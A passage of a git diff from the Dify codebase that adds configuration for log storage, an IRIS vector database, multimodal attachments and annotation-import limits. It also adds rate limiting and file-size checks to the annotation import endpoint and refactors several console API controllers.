permanent storage) +ALIYUN_SLS_LOGSTORE_TTL=365 +# Enable dual-write to both SLS LogStore and SQL database (default: false) +LOGSTORE_DUAL_WRITE_ENABLED=false +# Enable dual-read fallback to SQL database when LogStore returns no results (default: true) +# Useful for migration scenarios where historical data exists only in SQL database +LOGSTORE_DUAL_READ_ENABLED=true + # Celery beat configuration CELERY_BEAT_SCHEDULER_TIME=1 @@ -654,3 +673,25 @@ TENANT_ISOLATED_TASK_CONCURRENCY=1 # Maximum number of segments for dataset segments API (0 for unlimited) DATASET_MAX_SEGMENTS_PER_REQUEST=0 + +# Multimodal knowledgebase limit +SINGLE_CHUNK_ATTACHMENT_LIMIT=10 +ATTACHMENT_IMAGE_FILE_SIZE_LIMIT=2 +ATTACHMENT_IMAGE_DOWNLOAD_TIMEOUT=60 +IMAGE_FILE_BATCH_LIMIT=10 + +# Maximum allowed CSV file size for annotation import in megabytes +ANNOTATION_IMPORT_FILE_SIZE_LIMIT=2 +#Maximum number of annotation records allowed in a single import +ANNOTATION_IMPORT_MAX_RECORDS=10000 +# Minimum number of annotation records required in a single import +ANNOTATION_IMPORT_MIN_RECORDS=1 +ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE=5 +ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR=20 +# Maximum number of concurrent annotation import tasks per tenant +ANNOTATION_IMPORT_MAX_CONCURRENT=5 + +# Sandbox expired records clean configuration +SANDBOX_EXPIRED_RECORDS_CLEAN_GRACEFUL_PERIOD=21 +SANDBOX_EXPIRED_RECORDS_CLEAN_BATCH_SIZE=1000 +SANDBOX_EXPIRED_RECORDS_RETENTION_DAYS=30 diff --git a/api/README.md b/api/README.md index 2dab2ec6e6..794b05d3af 100644 --- a/api/README.md +++ b/api/README.md @@ -84,7 +84,7 @@ 1. If you need to handle and debug the async tasks (e.g. dataset importing and documents indexing), please start the worker service. ```bash -uv run celery -A app.celery worker -P threads -c 2 --loglevel INFO -Q dataset,priority_dataset,priority_pipeline,pipeline,mail,ops_trace,app_deletion,plugin,workflow_storage,conversation,workflow,schedule_poller,schedule_executor,triggered_workflow_dispatcher,trigger_refresh_executor +uv run celery -A app.celery worker -P threads -c 2 --loglevel INFO -Q dataset,priority_dataset,priority_pipeline,pipeline,mail,ops_trace,app_deletion,plugin,workflow_storage,conversation,workflow,schedule_poller,schedule_executor,triggered_workflow_dispatcher,trigger_refresh_executor,retention ``` Additionally, if you want to debug the celery scheduled tasks, you can run the following command in another terminal to start the beat service: diff --git a/api/app_factory.py b/api/app_factory.py index 3a3ee03cff..bcad88e9e0 100644 --- a/api/app_factory.py +++ b/api/app_factory.py @@ -75,6 +75,7 @@ def initialize_extensions(app: DifyApp): ext_import_modules, ext_logging, ext_login, + ext_logstore, ext_mail, ext_migrate, ext_orjson, @@ -83,6 +84,7 @@ def initialize_extensions(app: DifyApp): ext_redis, ext_request_logging, ext_sentry, + ext_session_factory, ext_set_secretkey, ext_storage, ext_timezone, @@ -104,6 +106,7 @@ def initialize_extensions(app: DifyApp): ext_migrate, ext_redis, ext_storage, + ext_logstore, # Initialize logstore after storage, before celery ext_celery, ext_login, ext_mail, @@ -114,6 +117,7 @@ def initialize_extensions(app: DifyApp): ext_commands, ext_otel, ext_request_logging, + ext_session_factory, ] for ext in extensions: short_name = ext.__name__.split(".")[-1] diff --git a/api/configs/feature/__init__.py b/api/configs/feature/__init__.py index b5ffd09d01..43dddbd011 100644 --- a/api/configs/feature/__init__.py +++ b/api/configs/feature/__init__.py @@ -218,7 +218,7 @@ class PluginConfig(BaseSettings): PLUGIN_DAEMON_TIMEOUT: PositiveFloat | None = Field( description="Timeout in seconds for requests to the plugin daemon (set to None to disable)", - default=300.0, + default=600.0, ) INNER_API_KEY_FOR_PLUGIN: str = Field(description="Inner api key for plugin", default="inner-api-key") @@ -360,6 +360,57 @@ class FileUploadConfig(BaseSettings): default=10, ) + IMAGE_FILE_BATCH_LIMIT: PositiveInt = Field( + description="Maximum number of files allowed in a image batch upload operation", + default=10, + ) + + SINGLE_CHUNK_ATTACHMENT_LIMIT: PositiveInt = Field( + description="Maximum number of files allowed in a single chunk attachment", + default=10, + ) + + ATTACHMENT_IMAGE_FILE_SIZE_LIMIT: NonNegativeInt = Field( + description="Maximum allowed image file size for attachments in megabytes", + default=2, + ) + + ATTACHMENT_IMAGE_DOWNLOAD_TIMEOUT: NonNegativeInt = Field( + description="Timeout for downloading image attachments in seconds", + default=60, + ) + + # Annotation Import Security Configurations + ANNOTATION_IMPORT_FILE_SIZE_LIMIT: NonNegativeInt = Field( + description="Maximum allowed CSV file size for annotation import in megabytes", + default=2, + ) + + ANNOTATION_IMPORT_MAX_RECORDS: PositiveInt = Field( + description="Maximum number of annotation records allowed in a single import", + default=10000, + ) + + ANNOTATION_IMPORT_MIN_RECORDS: PositiveInt = Field( + description="Minimum number of annotation records required in a single import", + default=1, + ) + + ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE: PositiveInt = Field( + description="Maximum number of annotation import requests per minute per tenant", + default=5, + ) + + ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR: PositiveInt = Field( + description="Maximum number of annotation import requests per hour per tenant", + default=20, + ) + + ANNOTATION_IMPORT_MAX_CONCURRENT: PositiveInt = Field( + description="Maximum number of concurrent annotation import tasks per tenant", + default=2, + ) + inner_UPLOAD_FILE_EXTENSION_BLACKLIST: str = Field( description=( "Comma-separated list of file extensions that are blocked from upload. " @@ -1219,6 +1270,21 @@ class TenantIsolatedTaskQueueConfig(BaseSettings): ) +class SandboxExpiredRecordsCleanConfig(BaseSettings): + SANDBOX_EXPIRED_RECORDS_CLEAN_GRACEFUL_PERIOD: NonNegativeInt = Field( + description="Graceful period in days for sandbox records clean after subscription expiration", + default=21, + ) + SANDBOX_EXPIRED_RECORDS_CLEAN_BATCH_SIZE: PositiveInt = Field( + description="Maximum number of records to process in each batch", + default=1000, + ) + SANDBOX_EXPIRED_RECORDS_RETENTION_DAYS: PositiveInt = Field( + description="Retention days for sandbox expired workflow_run records and message records", + default=30, + ) + + class FeatureConfig( # place the configs in alphabet order AppExecutionConfig, @@ -1244,6 +1310,7 @@ class FeatureConfig( PositionConfig, RagEtlConfig, RepositoryConfig, + SandboxExpiredRecordsCleanConfig, SecurityConfig, TenantIsolatedTaskQueueConfig, ToolConfig, diff --git a/api/configs/middleware/__init__.py b/api/configs/middleware/__init__.py index a5e35c99ca..63f75924bf 100644 --- a/api/configs/middleware/__init__.py +++ b/api/configs/middleware/__init__.py @@ -26,6 +26,7 @@ from .vdb.clickzetta_config import ClickzettaConfig from .vdb.couchbase_config import CouchbaseConfig from .vdb.elasticsearch_config import ElasticsearchConfig from .vdb.huawei_cloud_config import HuaweiCloudConfig +from .vdb.iris_config import IrisVectorConfig from .vdb.lindorm_config import LindormConfig from .vdb.matrixone_config import MatrixoneConfig from .vdb.milvus_config import MilvusConfig @@ -106,7 +107,7 @@ class KeywordStoreConfig(BaseSettings): class DatabaseConfig(BaseSettings): # Database type selector - DB_TYPE: Literal["postgresql", "mysql", "oceanbase"] = Field( + DB_TYPE: Literal["postgresql", "mysql", "oceanbase", "seekdb"] = Field( description="Database type to use. OceanBase is MySQL-compatible.", default="postgresql", ) @@ -336,6 +337,7 @@ class MiddlewareConfig( ChromaConfig, ClickzettaConfig, HuaweiCloudConfig, + IrisVectorConfig, MilvusConfig, AlibabaCloudMySQLConfig, MyScaleConfig, diff --git a/api/configs/middleware/vdb/iris_config.py b/api/configs/middleware/vdb/iris_config.py new file mode 100644 index 0000000000..c532d191c3 --- /dev/null +++ b/api/configs/middleware/vdb/iris_config.py @@ -0,0 +1,91 @@ +"""Configuration for InterSystems IRIS vector database.""" + +from pydantic import Field, PositiveInt, model_validator +from pydantic_settings import BaseSettings + + +class IrisVectorConfig(BaseSettings): + """Configuration settings for IRIS vector database connection and pooling.""" + + IRIS_HOST: str | None = Field( + description="Hostname or IP address of the IRIS server.", + default="localhost", + ) + + IRIS_SUPER_SERVER_PORT: PositiveInt | None = Field( + description="Port number for IRIS connection.", + default=1972, + ) + + IRIS_USER: str | None = Field( + description="Username for IRIS authentication.", + default="_SYSTEM", + ) + + IRIS_PASSWORD: str | None = Field( + description="Password for IRIS authentication.", + default="Dify@1234", + ) + + IRIS_SCHEMA: str | None = Field( + description="Schema name for IRIS tables.", + default="dify", + ) + + IRIS_DATABASE: str | None = Field( + description="Database namespace for IRIS connection.", + default="USER", + ) + + IRIS_CONNECTION_URL: str | None = Field( + description="Full connection URL for IRIS (overrides individual fields if provided).", + default=None, + ) + + IRIS_MIN_CONNECTION: PositiveInt = Field( + description="Minimum number of connections in the pool.", + default=1, + ) + + IRIS_MAX_CONNECTION: PositiveInt = Field( + description="Maximum number of connections in the pool.", + default=3, + ) + + IRIS_TEXT_INDEX: bool = Field( + description="Enable full-text search index using %iFind.Index.Basic.", + default=True, + ) + + IRIS_TEXT_INDEX_LANGUAGE: str = Field( + description="Language for full-text search index (e.g., 'en', 'ja', 'zh', 'de').", + default="en", + ) + + @model_validator(mode="before") + @classmethod + def validate_config(cls, values: dict) -> dict: + """Validate IRIS configuration values. + + Args: + values: Configuration dictionary + + Returns: + Validated configuration dictionary + + Raises: + ValueError: If required fields are missing or pool settings are invalid + """ + # Only validate required fields if IRIS is being used as the vector store + # This allows the config to be loaded even when IRIS is not in use + + # vector_store = os.environ.get("VECTOR_STORE", "") + # We rely on Pydantic defaults for required fields if they are missing from env. + # Strict existence check is removed to allow defaults to work. + + min_conn = values.get("IRIS_MIN_CONNECTION", 1) + max_conn = values.get("IRIS_MAX_CONNECTION", 3) + if min_conn > max_conn: + raise ValueError("IRIS_MIN_CONNECTION must be less than or equal to IRIS_MAX_CONNECTION") + + return values diff --git a/api/constants/languages.py b/api/constants/languages.py index 0312a558c9..8c1ce368ac 100644 --- a/api/constants/languages.py +++ b/api/constants/languages.py @@ -20,6 +20,7 @@ language_timezone_mapping = { "sl-SI": "Europe/Ljubljana", "th-TH": "Asia/Bangkok", "id-ID": "Asia/Jakarta", + "ar-TN": "Africa/Tunis", } languages = list(language_timezone_mapping.keys()) diff --git a/api/controllers/console/admin.py b/api/controllers/console/admin.py index 7aa1e6dbd8..a25ca5ef51 100644 --- a/api/controllers/console/admin.py +++ b/api/controllers/console/admin.py @@ -6,19 +6,20 @@ from flask import request from flask_restx import Resource from pydantic import BaseModel, Field, field_validator from sqlalchemy import select -from sqlalchemy.orm import Session from werkzeug.exceptions import NotFound, Unauthorized -P = ParamSpec("P") -R = TypeVar("R") from configs import dify_config from constants.languages import supported_language from controllers.console import console_ns from controllers.console.wraps import only_edition_cloud +from core.db.session_factory import session_factory from extensions.ext_database import db from libs.token import extract_access_token from models.model import App, InstalledApp, RecommendedApp +P = ParamSpec("P") +R = TypeVar("R") + DEFAULT_REF_TEMPLATE_SWAGGER_2_0 = "#/definitions/{model}" @@ -90,7 +91,7 @@ class InsertExploreAppListApi(Resource): privacy_policy = site.privacy_policy or payload.privacy_policy or "" custom_disclaimer = site.custom_disclaimer or payload.custom_disclaimer or "" - with Session(db.engine) as session: + with session_factory.create_session() as session: recommended_app = session.execute( select(RecommendedApp).where(RecommendedApp.app_id == payload.app_id) ).scalar_one_or_none() @@ -138,7 +139,7 @@ class InsertExploreAppApi(Resource): @only_edition_cloud @admin_required def delete(self, app_id): - with Session(db.engine) as session: + with session_factory.create_session() as session: recommended_app = session.execute( select(RecommendedApp).where(RecommendedApp.app_id == str(app_id)) ).scalar_one_or_none() @@ -146,13 +147,13 @@ class InsertExploreAppApi(Resource): if not recommended_app: return {"result": "success"}, 204 - with Session(db.engine) as session: + with session_factory.create_session() as session: app = session.execute(select(App).where(App.id == recommended_app.app_id)).scalar_one_or_none() if app: app.is_public = False - with Session(db.engine) as session: + with session_factory.create_session() as session: installed_apps = ( session.execute( select(InstalledApp).where( diff --git a/api/controllers/console/app/annotation.py b/api/controllers/console/app/annotation.py index 3b6fb58931..6a4c1528b0 100644 --- a/api/controllers/console/app/annotation.py +++ b/api/controllers/console/app/annotation.py @@ -1,6 +1,6 @@ from typing import Any, Literal -from flask import request +from flask import abort, make_response, request from flask_restx import Resource, fields, marshal, marshal_with from pydantic import BaseModel, Field, field_validator @@ -8,6 +8,8 @@ from controllers.common.errors import NoFileUploadedError, TooManyFilesError from controllers.console import console_ns from controllers.console.wraps import ( account_initialization_required, + annotation_import_concurrency_limit, + annotation_import_rate_limit, cloud_edition_billing_resource_check, edit_permission_required, setup_required, @@ -257,7 +259,7 @@ class AnnotationApi(Resource): @console_ns.route("/apps//annotations/export") class AnnotationExportApi(Resource): @console_ns.doc("export_annotations") - @console_ns.doc(description="Export all annotations for an app") + @console_ns.doc(description="Export all annotations for an app with CSV injection protection") @console_ns.doc(params={"app_id": "Application ID"}) @console_ns.response( 200, @@ -272,8 +274,14 @@ class AnnotationExportApi(Resource): def get(self, app_id): app_id = str(app_id) annotation_list = AppAnnotationService.export_annotation_list_by_app_id(app_id) - response = {"data": marshal(annotation_list, annotation_fields)} - return response, 200 + response_data = {"data": marshal(annotation_list, annotation_fields)} + + # Create response with secure headers for CSV export + response = make_response(response_data, 200) + response.headers["Content-Type"] = "application/json; charset=utf-8" + response.headers["X-Content-Type-Options"] = "nosniff" + + return response @console_ns.route("/apps//annotations/") @@ -314,18 +322,25 @@ class AnnotationUpdateDeleteApi(Resource): @console_ns.route("/apps//annotations/batch-import") class AnnotationBatchImportApi(Resource): @console_ns.doc("batch_import_annotations") - @console_ns.doc(description="Batch import annotations from CSV file") + @console_ns.doc(description="Batch import annotations from CSV file with rate limiting and security checks") @console_ns.doc(params={"app_id": "Application ID"}) @console_ns.response(200, "Batch import started successfully") @console_ns.response(403, "Insufficient permissions") @console_ns.response(400, "No file uploaded or too many files") + @console_ns.response(413, "File too large") + @console_ns.response(429, "Too many requests or concurrent imports") @setup_required @login_required @account_initialization_required @cloud_edition_billing_resource_check("annotation") + @annotation_import_rate_limit + @annotation_import_concurrency_limit @edit_permission_required def post(self, app_id): + from configs import dify_config + app_id = str(app_id) + # check file if "file" not in request.files: raise NoFileUploadedError() @@ -335,9 +350,27 @@ class AnnotationBatchImportApi(Resource): # get file from request file = request.files["file"] + # check file type if not file.filename or not file.filename.lower().endswith(".csv"): raise ValueError("Invalid file type. Only CSV files are allowed") + + # Check file size before processing + file.seek(0, 2) # Seek to end of file + file_size = file.tell() + file.seek(0) # Reset to beginning + + max_size_bytes = dify_config.ANNOTATION_IMPORT_FILE_SIZE_LIMIT * 1024 * 1024 + if file_size > max_size_bytes: + abort( + 413, + f"File size exceeds maximum limit of {dify_config.ANNOTATION_IMPORT_FILE_SIZE_LIMIT}MB. " + f"Please reduce the file size and try again.", + ) + + if file_size == 0: + raise ValueError("The uploaded file is empty") + return AppAnnotationService.batch_import_app_annotations(app_id, file) diff --git a/api/controllers/console/app/message.py b/api/controllers/console/app/message.py index 377297c84c..12ada8b798 100644 --- a/api/controllers/console/app/message.py +++ b/api/controllers/console/app/message.py @@ -61,6 +61,7 @@ class ChatMessagesQuery(BaseModel): class MessageFeedbackPayload(BaseModel): message_id: str = Field(..., description="Message ID") rating: Literal["like", "dislike"] | None = Field(default=None, description="Feedback rating") + content: str | None = Field(default=None, description="Feedback content") @field_validator("message_id") @classmethod @@ -324,6 +325,7 @@ class MessageFeedbackApi(Resource): db.session.delete(feedback) elif args.rating and feedback: feedback.rating = args.rating + feedback.content = args.content elif not args.rating and not feedback: raise ValueError("rating cannot be None when feedback not exists") else: @@ -335,6 +337,7 @@ class MessageFeedbackApi(Resource): conversation_id=message.conversation_id, message_id=message.id, rating=rating_value, + content=args.content, from_source="admin", from_account_id=current_user.id, ) diff --git a/api/controllers/console/app/workflow_trigger.py b/api/controllers/console/app/workflow_trigger.py index 5d16e4f979..9433b732e4 100644 --- a/api/controllers/console/app/workflow_trigger.py +++ b/api/controllers/console/app/workflow_trigger.py @@ -114,7 +114,7 @@ class AppTriggersApi(Resource): @console_ns.route("/apps//trigger-enable") class AppTriggerEnableApi(Resource): - @console_ns.expect(console_ns.models[ParserEnable.__name__], validate=True) + @console_ns.expect(console_ns.models[ParserEnable.__name__]) @setup_required @login_required @account_initialization_required diff --git a/api/controllers/console/auth/login.py b/api/controllers/console/auth/login.py index f486f4c313..772d98822e 100644 --- a/api/controllers/console/auth/login.py +++ b/api/controllers/console/auth/login.py @@ -22,7 +22,12 @@ from controllers.console.error import ( NotAllowedCreateWorkspace, WorkspacesLimitExceeded, ) -from controllers.console.wraps import email_password_login_enabled, setup_required +from controllers.console.wraps import ( + decrypt_code_field, + decrypt_password_field, + email_password_login_enabled, + setup_required, +) from events.tenant_event import tenant_was_created from libs.helper import EmailStr, extract_remote_ip from libs.login import current_account_with_tenant @@ -79,6 +84,7 @@ class LoginApi(Resource): @setup_required @email_password_login_enabled @console_ns.expect(console_ns.models[LoginPayload.__name__]) + @decrypt_password_field def post(self): """Authenticate user and login.""" args = LoginPayload.model_validate(console_ns.payload) @@ -218,6 +224,7 @@ class EmailCodeLoginSendEmailApi(Resource): class EmailCodeLoginApi(Resource): @setup_required @console_ns.expect(console_ns.models[EmailCodeLoginPayload.__name__]) + @decrypt_code_field def post(self): args = EmailCodeLoginPayload.model_validate(console_ns.payload) diff --git a/api/controllers/console/datasets/data_source.py b/api/controllers/console/datasets/data_source.py index 01f268d94d..cd958bbb36 100644 --- a/api/controllers/console/datasets/data_source.py +++ b/api/controllers/console/datasets/data_source.py @@ -140,6 +140,18 @@ class DataSourceNotionListApi(Resource): credential_id = request.args.get("credential_id", default=None, type=str) if not credential_id: raise ValueError("Credential id is required.") + + # Get datasource_parameters from query string (optional, for GitHub and other datasources) + datasource_parameters_str = request.args.get("datasource_parameters", default=None, type=str) + datasource_parameters = {} + if datasource_parameters_str: + try: + datasource_parameters = json.loads(datasource_parameters_str) + if not isinstance(datasource_parameters, dict): + raise ValueError("datasource_parameters must be a JSON object.") + except json.JSONDecodeError: + raise ValueError("Invalid datasource_parameters JSON format.") + datasource_provider_service = DatasourceProviderService() credential = datasource_provider_service.get_datasource_credentials( tenant_id=current_tenant_id, @@ -187,7 +199,7 @@ class DataSourceNotionListApi(Resource): online_document_result: Generator[OnlineDocumentPagesMessage, None, None] = ( datasource_runtime.get_online_document_pages( user_id=current_user.id, - datasource_parameters={}, + datasource_parameters=datasource_parameters, provider_type=datasource_runtime.datasource_provider_type(), ) ) @@ -218,14 +230,14 @@ class DataSourceNotionListApi(Resource): @console_ns.route( - "/notion/workspaces//pages///preview", + "/notion/pages///preview", "/datasets/notion-indexing-estimate", ) class DataSourceNotionApi(Resource): @setup_required @login_required @account_initialization_required - def get(self, workspace_id, page_id, page_type): + def get(self, page_id, page_type): _, current_tenant_id = current_account_with_tenant() credential_id = request.args.get("credential_id", default=None, type=str) @@ -239,11 +251,10 @@ class DataSourceNotionApi(Resource): plugin_id="langgenius/notion_datasource", ) - workspace_id = str(workspace_id) page_id = str(page_id) extractor = NotionExtractor( - notion_workspace_id=workspace_id, + notion_workspace_id="", notion_obj_id=page_id, notion_page_type=page_type, notion_access_token=credential.get("integration_secret"), diff --git a/api/controllers/console/datasets/datasets.py b/api/controllers/console/datasets/datasets.py index 1fad8abd52..8ceb896d4f 100644 --- a/api/controllers/console/datasets/datasets.py +++ b/api/controllers/console/datasets/datasets.py @@ -146,11 +146,12 @@ class DatasetUpdatePayload(BaseModel): embedding_model: str | None = None embedding_model_provider: str | None = None retrieval_model: dict[str, Any] | None = None - partial_member_list: list[str] | None = None + partial_member_list: list[dict[str, str]] | None = None external_retrieval_model: dict[str, Any] | None = None external_knowledge_id: str | None = None external_knowledge_api_id: str | None = None icon_info: dict[str, Any] | None = None + is_multimodal: bool | None = False @field_validator("indexing_technique") @classmethod @@ -222,6 +223,7 @@ def _get_retrieval_methods_by_vector_type(vector_type: str | None, is_mock: bool VectorType.COUCHBASE, VectorType.OPENGAUSS, VectorType.OCEANBASE, + VectorType.SEEKDB, VectorType.TABLESTORE, VectorType.HUAWEI_CLOUD, VectorType.TENCENT, @@ -229,6 +231,7 @@ def _get_retrieval_methods_by_vector_type(vector_type: str | None, is_mock: bool VectorType.CLICKZETTA, VectorType.BAIDU, VectorType.ALIBABACLOUD_MYSQL, + VectorType.IRIS, } semantic_methods = {"retrieval_method": [RetrievalMethod.SEMANTIC_SEARCH.value]} @@ -421,19 +424,18 @@ class DatasetApi(Resource): raise NotFound("Dataset not found.") payload = DatasetUpdatePayload.model_validate(console_ns.payload or {}) - payload_data = payload.model_dump(exclude_unset=True) current_user, current_tenant_id = current_account_with_tenant() - # check embedding model setting if ( payload.indexing_technique == "high_quality" and payload.embedding_model_provider is not None and payload.embedding_model is not None ): - DatasetService.check_embedding_model_setting( + is_multimodal = DatasetService.check_is_multimodal_model( dataset.tenant_id, payload.embedding_model_provider, payload.embedding_model ) - + payload.is_multimodal = is_multimodal + payload_data = payload.model_dump(exclude_unset=True) # The role of the current user in the ta table must be admin, owner, editor, or dataset_operator DatasetPermissionService.check_permission( current_user, dataset, payload.permission, payload.partial_member_list diff --git a/api/controllers/console/datasets/datasets_document.py b/api/controllers/console/datasets/datasets_document.py index 2520111281..6145da31a5 100644 --- a/api/controllers/console/datasets/datasets_document.py +++ b/api/controllers/console/datasets/datasets_document.py @@ -424,6 +424,10 @@ class DatasetInitApi(Resource): model_type=ModelType.TEXT_EMBEDDING, model=knowledge_config.embedding_model, ) + is_multimodal = DatasetService.check_is_multimodal_model( + current_tenant_id, knowledge_config.embedding_model_provider, knowledge_config.embedding_model + ) + knowledge_config.is_multimodal = is_multimodal except InvokeAuthorizationError: raise ProviderNotInitializeError( "No Embedding Model available. Please configure a valid provider in the Settings -> Model Provider." diff --git a/api/controllers/console/datasets/datasets_segments.py b/api/controllers/console/datasets/datasets_segments.py index ee390cbfb7..e73abc2555 100644 --- a/api/controllers/console/datasets/datasets_segments.py +++ b/api/controllers/console/datasets/datasets_segments.py @@ -51,6 +51,7 @@ class SegmentCreatePayload(BaseModel): content: str answer: str | None = None keywords: list[str] | None = None + attachment_ids: list[str] | None = None class SegmentUpdatePayload(BaseModel): @@ -58,6 +59,7 @@ class SegmentUpdatePayload(BaseModel): answer: str | None = None keywords: list[str] | None = None regenerate_child_chunks: bool = False + attachment_ids: list[str] | None = None class BatchImportPayload(BaseModel): diff --git a/api/controllers/console/datasets/hit_testing_base.py b/api/controllers/console/datasets/hit_testing_base.py index fac90a0135..db7c50f422 100644 --- a/api/controllers/console/datasets/hit_testing_base.py +++ b/api/controllers/console/datasets/hit_testing_base.py @@ -1,7 +1,7 @@ import logging from typing import Any -from flask_restx import marshal +from flask_restx import marshal, reqparse from pydantic import BaseModel, Field from werkzeug.exceptions import Forbidden, InternalServerError, NotFound @@ -33,6 +33,7 @@ class HitTestingPayload(BaseModel): query: str = Field(max_length=250) retrieval_model: dict[str, Any] | None = None external_retrieval_model: dict[str, Any] | None = None + attachment_ids: list[str] | None = None class DatasetsHitTestingBase: @@ -54,16 +55,28 @@ class DatasetsHitTestingBase: def hit_testing_args_check(args: dict[str, Any]): HitTestingService.hit_testing_args_check(args) + @staticmethod + def parse_args(): + parser = ( + reqparse.RequestParser() + .add_argument("query", type=str, required=False, location="json") + .add_argument("attachment_ids", type=list, required=False, location="json") + .add_argument("retrieval_model", type=dict, required=False, location="json") + .add_argument("external_retrieval_model", type=dict, required=False, location="json") + ) + return parser.parse_args() + @staticmethod def perform_hit_testing(dataset, args): assert isinstance(current_user, Account) try: response = HitTestingService.retrieve( dataset=dataset, - query=args["query"], + query=args.get("query"), account=current_user, - retrieval_model=args["retrieval_model"], - external_retrieval_model=args["external_retrieval_model"], + retrieval_model=args.get("retrieval_model"), + external_retrieval_model=args.get("external_retrieval_model"), + attachment_ids=args.get("attachment_ids"), limit=10, ) return {"query": response["query"], "records": marshal(response["records"], hit_testing_record_fields)} diff --git a/api/controllers/console/datasets/rag_pipeline/datasource_content_preview.py b/api/controllers/console/datasets/rag_pipeline/datasource_content_preview.py index 42387557d6..7caf5b52ed 100644 --- a/api/controllers/console/datasets/rag_pipeline/datasource_content_preview.py +++ b/api/controllers/console/datasets/rag_pipeline/datasource_content_preview.py @@ -26,7 +26,7 @@ console_ns.schema_model(Parser.__name__, Parser.model_json_schema(ref_template=D @console_ns.route("/rag/pipelines//workflows/published/datasource/nodes//preview") class DataSourceContentPreviewApi(Resource): - @console_ns.expect(console_ns.models[Parser.__name__], validate=True) + @console_ns.expect(console_ns.models[Parser.__name__]) @setup_required @login_required @account_initialization_required diff --git a/api/controllers/console/datasets/rag_pipeline/rag_pipeline_workflow.py b/api/controllers/console/datasets/rag_pipeline/rag_pipeline_workflow.py index debe8eed97..46d67f0581 100644 --- a/api/controllers/console/datasets/rag_pipeline/rag_pipeline_workflow.py +++ b/api/controllers/console/datasets/rag_pipeline/rag_pipeline_workflow.py @@ -4,7 +4,7 @@ from typing import Any, Literal, cast from uuid import UUID from flask import abort, request -from flask_restx import Resource, marshal_with # type: ignore +from flask_restx import Resource, marshal_with, reqparse # type: ignore from pydantic import BaseModel, Field from sqlalchemy.orm import Session from werkzeug.exceptions import Forbidden, InternalServerError, NotFound @@ -975,6 +975,11 @@ class RagPipelineRecommendedPluginApi(Resource): @login_required @account_initialization_required def get(self): + parser = reqparse.RequestParser() + parser.add_argument("type", type=str, location="args", required=False, default="all") + args = parser.parse_args() + type = args["type"] + rag_pipeline_service = RagPipelineService() - recommended_plugins = rag_pipeline_service.get_recommended_plugins() + recommended_plugins = rag_pipeline_service.get_recommended_plugins(type) return recommended_plugins diff --git a/api/controllers/console/explore/completion.py b/api/controllers/console/explore/completion.py index 78e9a87a3d..a6e5b2822a 100644 --- a/api/controllers/console/explore/completion.py +++ b/api/controllers/console/explore/completion.py @@ -2,7 +2,7 @@ import logging from typing import Any, Literal from uuid import UUID -from pydantic import BaseModel, Field +from pydantic import BaseModel, Field, field_validator from werkzeug.exceptions import InternalServerError, NotFound import services @@ -40,7 +40,7 @@ from .. import console_ns logger = logging.getLogger(__name__) -class CompletionMessagePayload(BaseModel): +class CompletionMessageExplorePayload(BaseModel): inputs: dict[str, Any] query: str = "" files: list[dict[str, Any]] | None = None @@ -52,12 +52,26 @@ class ChatMessagePayload(BaseModel): inputs: dict[str, Any] query: str files: list[dict[str, Any]] | None = None - conversation_id: UUID | None = None - parent_message_id: UUID | None = None + conversation_id: str | None = None + parent_message_id: str | None = None retriever_from: str = Field(default="explore_app") + @field_validator("conversation_id", "parent_message_id", mode="before") + @classmethod + def normalize_uuid(cls, value: str | UUID | None) -> str | None: + """ + Accept blank IDs and validate UUID format when provided. + """ + if not value: + return None -register_schema_models(console_ns, CompletionMessagePayload, ChatMessagePayload) + try: + return helper.uuid_value(value) + except ValueError as exc: + raise ValueError("must be a valid UUID") from exc + + +register_schema_models(console_ns, CompletionMessageExplorePayload, ChatMessagePayload) # define completion api for user @@ -66,13 +80,13 @@ register_schema_models(console_ns, CompletionMessagePayload, ChatMessagePayload) endpoint="installed_app_completion", ) class CompletionApi(InstalledAppResource): - @console_ns.expect(console_ns.models[CompletionMessagePayload.__name__]) + @console_ns.expect(console_ns.models[CompletionMessageExplorePayload.__name__]) def post(self, installed_app): app_model = installed_app.app if app_model.mode != AppMode.COMPLETION: raise NotCompletionAppError() - payload = CompletionMessagePayload.model_validate(console_ns.payload or {}) + payload = CompletionMessageExplorePayload.model_validate(console_ns.payload or {}) args = payload.model_dump(exclude_none=True) streaming = payload.response_mode == "streaming" diff --git a/api/controllers/console/explore/conversation.py b/api/controllers/console/explore/conversation.py index 157d5a135b..51995b8b8a 100644 --- a/api/controllers/console/explore/conversation.py +++ b/api/controllers/console/explore/conversation.py @@ -1,9 +1,8 @@ from typing import Any -from uuid import UUID from flask import request from flask_restx import marshal_with -from pydantic import BaseModel, Field +from pydantic import BaseModel, Field, model_validator from sqlalchemy.orm import Session from werkzeug.exceptions import NotFound @@ -13,6 +12,7 @@ from controllers.console.explore.wraps import InstalledAppResource from core.app.entities.app_invoke_entities import InvokeFrom from extensions.ext_database import db from fields.conversation_fields import conversation_infinite_scroll_pagination_fields, simple_conversation_fields +from libs.helper import UUIDStrOrEmpty from libs.login import current_user from models import Account from models.model import AppMode @@ -24,15 +24,22 @@ from .. import console_ns class ConversationListQuery(BaseModel): - last_id: UUID | None = None + last_id: UUIDStrOrEmpty | None = None limit: int = Field(default=20, ge=1, le=100) pinned: bool | None = None class ConversationRenamePayload(BaseModel): - name: str + name: str | None = None auto_generate: bool = False + @model_validator(mode="after") + def validate_name_requirement(self): + if not self.auto_generate: + if self.name is None or not self.name.strip(): + raise ValueError("name is required when auto_generate is false") + return self + register_schema_models(console_ns, ConversationListQuery, ConversationRenamePayload) diff --git a/api/controllers/console/explore/installed_app.py b/api/controllers/console/explore/installed_app.py index 3c95779475..e42db10ba6 100644 --- a/api/controllers/console/explore/installed_app.py +++ b/api/controllers/console/explore/installed_app.py @@ -2,7 +2,8 @@ import logging from typing import Any from flask import request -from flask_restx import Resource, inputs, marshal_with, reqparse +from flask_restx import Resource, marshal_with +from pydantic import BaseModel from sqlalchemy import and_, select from werkzeug.exceptions import BadRequest, Forbidden, NotFound @@ -18,6 +19,15 @@ from services.account_service import TenantService from services.enterprise.enterprise_service import EnterpriseService from services.feature_service import FeatureService + +class InstalledAppCreatePayload(BaseModel): + app_id: str + + +class InstalledAppUpdatePayload(BaseModel): + is_pinned: bool | None = None + + logger = logging.getLogger(__name__) @@ -105,26 +115,25 @@ class InstalledAppsListApi(Resource): @account_initialization_required @cloud_edition_billing_resource_check("apps") def post(self): - parser = reqparse.RequestParser().add_argument("app_id", type=str, required=True, help="Invalid app_id") - args = parser.parse_args() + payload = 